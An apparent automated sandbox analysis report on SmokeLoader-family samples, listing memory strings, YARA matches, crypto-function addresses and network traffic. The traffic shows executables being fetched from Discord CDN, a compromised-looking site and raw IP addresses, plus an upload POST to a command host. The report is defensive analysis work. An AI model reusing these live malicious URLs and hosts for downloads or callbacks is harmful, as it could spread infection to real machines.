Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chromeMz
Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: DB56.exe, 00000011.00000002.532354864.0000000003D61000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.617991454.0000000000402000.00000040.00000001.sdmp, 4924.exe, 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.625266789.0000000002610000.00000004.00020000.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab4
Source: 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabP
Source: 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: https://get.adob
Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: https://helpx.ad
Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 8CE5.exe.5.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: rcacademy.at
Source: global traffic HTTP traffic detected: GET /attachments/921473641538027521/921473810035793960/Vorticism.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: bastinscustomfab.com
Source: global traffic HTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: www.bastinscustomfab.com | Cookie: PHPSESSID=905f1348cca402f214daeb63de69114c
Source: global traffic HTTP traffic detected: GET /Igno.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 45.9.20.240:7769
Source: global traffic HTTP traffic detected: GET /install3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.112.83.8
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 18 Dec 2021 14:32:14 GMT | Server: Apache | X-Powered-By: PHP/7.3.33 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://www.bastinscustomfab.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240 (reported 50 times)
Source: 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: m9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: unknown HTTP traffic detected: POST /upload/ HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://sbhfij.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 167
    Host: rcacademy.at
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49831 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match File source: 0.2.fw8ex1BNek.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.fw8ex1BNek.exe.630e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.acgvitw.630e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.acgvitw.640000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.fw8ex1BNek.exe.640000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.acgvitw.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.481080184.0000000000661000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.405588327.0000000002E51000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.427646956.00000000007C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.468340916.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.481062049.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.427536379.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.360531074.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: fw8ex1BNek.exe, 00000000.00000002.427675780.000000000080A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Note: the only evidence behind this signature is a hook-descriptor string naming DDRAW.DLL / DirectDrawCreateEx, which is DirectDraw (graphics), not DirectInput; on its own it does not establish keystroke capture.

System Summary:

Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF9760 17_2_02BF9760
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF0BDF 17_2_02BF0BDF
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF0BC4 17_2_02BF0BC4
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF0B7A 17_2_02BF0B7A
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF0B48 17_2_02BF0B48
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF0C23 17_2_02BF0C23
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF0470 17_2_02BF0470
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF0462 17_2_02BF0462
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052FDE38 17_2_052FDE38
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052F8DE8 17_2_052F8DE8
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052F8DF8 17_2_052F8DF8
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052FCC68 17_2_052FCC68
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052F865A 17_2_052F865A
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052FA050 17_2_052FA050
